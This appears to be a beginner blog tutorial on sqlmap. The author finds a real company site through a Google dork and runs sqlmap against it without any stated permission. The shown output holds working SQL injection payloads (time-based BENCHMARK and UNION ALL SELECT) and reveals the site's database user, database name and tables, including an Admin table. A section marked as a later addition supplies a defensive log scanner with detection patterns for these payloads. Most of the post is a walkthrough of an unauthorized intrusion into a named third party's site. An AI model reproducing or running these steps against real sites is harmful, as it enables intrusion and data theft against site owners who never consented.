SQLMAP Beginner Injection

Source: Internet
Author: User

What is sqlmap?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

In other words, sqlmap is an open source tool that automatically detects and exploits SQL injection vulnerabilities and takes over database servers. It has a powerful detection engine and many features for probing servers and taking over database servers.

In short, sqlmap is a tool for taking over sites.

Installation

sqlmap needs Python 2.6 or 2.7; note that only these two major versions work. It can be installed with easy_install or by git clone from the repository.

Finding a site

Google hacking: inurl:\".php\?id=

Let's try the second result: www.cowinbio.com/about/index.php?id=1

Let's get started.

Blind (heavy query)' injectable
[10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:07:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
[10:07:49] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind

And then

         _
 ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:15:04

You provided 'MySQL' as a back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is 'MySQL < 5.0.11'. Do you really want to force the back-end DBMS value? [y/N] y
[10:15:22] [INFO] testing connection to the target URL
[10:15:22] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a797526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
---
[10:15:23] [INFO] testing MySQL
[10:15:23] [INFO] confirming MySQL
[10:15:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:15:23] [INFO] fetching current user
current user: '[email protected]'

And after that,

         _
 ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:16:44

[10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a797526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database: 'cw'

Database: cw
[3 tables]
+---------+
| Admin   |
| News    |
| Product |
+---------+
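
For whoever operates a site like this one, the two payload families in the sqlmap output above (the BENCHMARK heavy query and the UNION ALL SELECT probe) leave recognisable traces in web access logs. The following is an added example, not part of the original post or of sqlmap: a small log scanner whose function names, signature names, log format (combined format is assumed) and sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the two payload families shown above, plus sqlmap's default User-Agent prefix.
SIGNATURES = {
    "time_based_heavy_query": re.compile(
        r"\bBENCHMARK\s*\(\s*\d{5,}\s*,\s*MD5\s*\(", re.I),
    "union_query_probe": re.compile(
        r"\bUNION\s+ALL\s+SELECT\s+(?:NULL|CONCAT\s*\(\s*0x[0-9a-f]+)", re.I),
    "sqlmap_user_agent": re.compile(r"\bsqlmap/\d", re.I),
}
# Assumed combined log format: ip - - [time] "METHOD uri PROTO" status size "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def scan_line(line):
    """Return (client_ip, sorted signature names), or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    for _ in range(3):  # decode repeatedly so double URL-encoding cannot hide it
        decoded = unquote_plus(uri)
        if decoded == uri:
            break
        uri = decoded
    hits = sorted(name for name, rx in SIGNATURES.items()
                  if rx.search(uri) or rx.search(m.group("ua")))
    return (m.group("ip"), hits) if hits else None

def summarize(lines):
    """Map client IP -> set of signatures seen across all of its requests."""
    seen = {}
    for line in lines:
        hit = scan_line(line)
        if hit:
            seen.setdefault(hit[0], set()).update(hit[1])
    return seen

def _entry(ip, uri, ua):  # builds one constructed log line
    return f'{ip} - - [01/Jan/2015:10:07:47 +0000] "GET {uri} HTTP/1.1" 200 512 "-" "{ua}"'
# Constructed sample log: documentation IPs, made-up timestamp, size and UA strings.
SAMPLE_LOG = [
    _entry("192.0.2.10", "/about/index.php?id=1%20AND%205889%3DBENCHMARK%285000000%2CMD5%280x6d6c765a%29%29", "sqlmap/1.0-dev (http://sqlmap.org)"),
    _entry("192.0.2.10", "/about/index.php?id=-2036%20UNION%20ALL%20SELECT%20CONCAT%280x716a767a71%2C0x41%2C0x7162766271%29%2CNULL--%20-", "sqlmap/1.0-dev (http://sqlmap.org)"),
    _entry("203.0.113.5", "/about/index.php?id=1%2520AND%25205889%253DBENCHMARK%25285000000%252CMD5%25280x6d6c765a%2529%2529", "Mozilla/5.0"),
    _entry("198.51.100.7", "/news/index.php?q=credit+union+benchmark", "Mozilla/5.0"),
]
if __name__ == "__main__": print(summarize(SAMPLE_LOG))
```

The last sample line shows that ordinary searches containing the words "union" or "benchmark" do not match. The real fix for the flaw shown in the output is still to bind `id` as a typed parameter in the query.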

Let's stop here. After all, this is just a blog post. I will not go any deeper, and I hope those of you passing by will not try to go further either.

Also, a friendly reminder to this site: you are not very secure.

I solemnly declare that the above article is my original work; if you repost it, please indicate the source. Small Three thanks you here ~ ~.
